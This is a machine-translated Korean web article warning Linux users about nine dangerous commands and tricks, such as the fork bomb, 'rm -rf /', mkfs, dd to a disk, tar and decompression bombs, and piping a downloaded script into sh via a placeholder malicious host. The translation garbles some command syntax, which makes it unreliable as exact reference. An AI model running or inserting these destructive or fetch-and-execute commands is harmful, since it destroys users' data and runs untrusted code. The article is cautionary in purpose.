홈페이지 » 데스크톱 » 9 조심해야 할 리눅스 명령과 코드

    9 조심해야 할 리눅스 명령과 코드

    리눅스 셸 / 터미널 명령은 매우 강력합니다. 간단한 명령만으로도 폴더, 파일 또는 루트 폴더 등을 삭제할 수 있습니다..

    어떤 경우에는 리눅스가 확인을 요구하지 않고 명령을 즉시 실행하여 소중한 데이터와 정보를 잃어 버린다. 이 파일들과 폴더들에 저장 됨.

    사람들이 웹에 콘텐츠를 게시하는 것은 일반적입니다. 이 명령을 실행하는 새로운 Linux 사용자 권장. 이것은 내용을 게시 한 누군가를위한 농담 같이 보일지도 모르지만 반대쪽에있는 사람에게는 웃기는 일이 아닙니다..

    우리는 여러분의 시스템에 피해를 줄 수있는 매우 위험한 몇 가지 리눅스 명령어를 모았습니다. 그들은 실제로 위험하다는 것을 명심하십시오. 새로운 명령을 만들기 위해 다양한 방법으로 변경 될 수 있습니다 더 많은 피해를 입히다..

    주목해야 할 중요한 점은 이들 명령 중 일부는 Ubuntu에서 sudo를 접두사로 사용하는 경우에만 위험합니다.. 리눅스의 다른 배포판에서는 이러한 명령의 대부분이 루트로서 실행하기에 위험합니다.

    살펴보기 실행을 피해야하는 9 개의 명령어와 코드.

    1. 리눅스 포크 폭탄 명령

    : () : | : & ;: 또한 ~으로 알려진 포크 폭탄 Linux 시스템에 대한 서비스 거부 공격. : () : | : & ;: bash 함수입니다. 일단 실행되면, 시스템이 정지 할 때까지 여러 번 반복됩니다..

    시스템을 다시 시작해야만 제거 할 수 있습니다. Linux 쉘에서이 명령을 실행할 때주의하십시오..

    2. mv 폴더 / dev / null 명령

    mv 폴더 / dev / null 또 다른 위험한 명령이다.. 데브 / null 또는 널 장치 ~이다. 기록 된 모든 데이터를 폐기하지만 쓰기 작업이 성공적으로 수행되었다고보고하는 장치 파일. 그것은 또한으로 알려져 있습니다 비트 버클 또는 블랙홀.

    3. rm -rf 명령

    RM -RF 명령은 빠른 방법입니다. 폴더와 그 내용을 지우다. Linux 운영 체제에서. 올바르게 사용하는 방법을 모른다면 시스템에 매우 위험 할 수 있습니다. rm-rf 명령과 함께 사용되는 가장 일반적인 조합 및 옵션은 다음과 같습니다.

    • RM 명령은 Linux 시스템에서 파일을 삭제하는 데 사용됩니다..
    • rm -f 명령은 메시지를 표시하지 않고 폴더의 읽기 전용 파일을 제거합니다..
    • rm -r 명령은 폴더의 내용을 재귀 적으로 삭제합니다..
    • rm -d 명령은 빈 디렉토리를 제거하는 데 사용되지만 디렉토리가 비어 있지 않으면 디렉토리 제거를 거부합니다..
    • rm -rf / 명령은 루트 디렉토리와 하위 폴더에있는 모든 내용의 강제 삭제 (쓰기 보호 된 경우에도 삭제)에 사용됩니다..
    • rm -rf * 명령은 현재 디렉토리 (현재 작업중인 디렉토리)와 하위 폴더의 모든 내용을 강제로 삭제하는 데 사용됩니다.
    • RM -RF. 명령은 현재 폴더 및 하위 폴더의 모든 내용을 강제로 삭제하는 데 사용됩니다. 그만큼 rm -r. [^.] * 명령을 사용할 수도 있습니다..
    • RM -i 명령은 파일 및 폴더 제거에 사용되지만 제거 전에 프롬프트가 나타납니다.

    4. mkfs 명령

    mkfs 리눅스 기반 시스템의 목적을 모를 경우 위험한 명령이 될 수 있습니다. mkfs 다음에 쓰여진 내용은 공백의 Linux 파일 시스템으로 포맷되고 대체됩니다..

    아래에 언급 된 모든 명령은 하드 드라이브를 포맷하며 관리자 권한이 필요합니다.

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    명령 mkfs.cramfs 위와 동일한 작업을 수행하지만 관리자 권한을 필요로하지 않습니다..

    5. 타르 폭탄

    그만큼 타르 명령은 여러 파일을 하나의 파일 (아카이브 파일)로 결합하는 데 사용됩니다. .타르 체재. 이 명령으로 테이프 아카이브 (Tar) 폭탄을 만들 수 있습니다..

    그것은 기존 파일과 비슷한 이름으로 수천 또는 수백만 개의 파일로 압축되어 현재 디렉토리에있는 아카이브 파일 untarred 될 때 새로운 디렉토리보다는 오히려.

    너는 타르 폭탄의 희생자가되는 것을 피할 수있다. tar 파일을받을 때마다 정기적으로 새로운 보호 디렉토리를 만듭니다. untarring하기 전에 수신 된 tar 파일을이 디렉토리로 옮긴다..

    tar 파일이 실제로 tar 폭탄이라면 새로 생성 된 디렉토리를 제거하여 제거 할 수 있습니다. 타르 폭탄의 폭발을 피하는 또 다른 방법은 그만큼 -티 -tar 파일의 모든 내용을 나열하는 옵션 tar 파일에 포함 된 콘텐츠 유형에 대한 아이디어를 제공합니다..

    6. dd 명령

    그만큼 DD 명령은 하드 디스크 파티션 복사 및 변환. 그러나 잘못된 목적지를 지정하면 위험 할 수 있습니다..

    명령은 다음 중 하나 일 수 있습니다.

    • dd if = / dev / hda of = / dev / hdb
    • dd if = / dev / hda of = / dev / sdb
    • dd if = something of = / dev / hda
    • dd if = something of = / dev / sda

    다음 명령은 전체 기본 하드 드라이브를 0으로 만듭니다. dd if = / dev / zero of = / dev / had

    7. 쉘 스크립트 코드

    누군가 당신을 희생시킬 수 있습니다. 쉘 스크립트에 대한 링크를 제공하고 다운로드 및 실행을 보증합니다.. 스크립트에는 악의적이거나 위험한 코드가 들어있을 수 있습니다. 그만큼 명령 형식 다음과 같이 보일 수 있습니다. wget http : // some_malicious_source -O- | 쉬. 그만큼 wget sh가 스크립트 실행을 다운로드하는 동안 스크립트를 다운로드합니다..

    8. 악성 코드

    누군가 당신에게 소스 코드를 제공하고 그것을 컴파일하도록 요청합니다. 코드 정상적인 코드로 보일 수 있지만 실제로는 일부 악성 코드가 큰 소스 코드로 위장되어 있습니다. 시스템에 해를 끼칠 수 있습니다. 이런 종류의 공격으로 희생당하는 것을 피하려면, 신뢰할 수있는 출처의 소스 코드 만 받아들이고 컴파일하십시오..

    9. 감압 폭탄

    압축 파일을 받았으며이 파일의 압축을 풀라는 메시지가 표시됩니다.이 파일의 크기는 매우 작지만 크기는 몇 KB 정도입니다. 사실로, 이 작은 크기의 압축 파일에는 매우 압축 된 데이터가 들어 있습니다..

    파일이 압축 해제되면 수백 GB의 데이터가 추출됩니다. 하드 드라이브를 가득 채울 수 있습니다. 시스템의 성능을 저하시킵니다. 이러한 상황을 피하려면 항상 신뢰할 수있는 출처의 데이터를 수락해야합니다..